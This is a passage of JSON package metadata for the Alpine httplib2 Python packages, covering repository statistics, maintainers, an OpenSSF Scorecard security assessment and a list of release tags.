/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T17:29:57.686Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":25.225414132941914,"stargazers_count":5.116376598867687,"forks_count":3.5961417487942966,"average":8.484483120150975},"purl":"pkg:apk/alpine/py-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":248,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T07:06:41.469Z","updated_at":"2023-02-01T07:06:41.469Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.8","url":"https://pkgs.alpinelinux.org/packages?branch=v3.8","ecosystem":"alpine","default":false,"packages_count":9538,"maintainers_count":148,"namespaces_count":2,"keywords_count":770,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":337},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.817Z","updated_at":"2026-08-12T05:03:16.204Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/namespaces"}},{"id":11138981,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-03-10T13:07:24.627Z","created_at":"2024-12-07T12:42:20.246Z","updated_at":"2026-08-21T17:29:58.633Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tag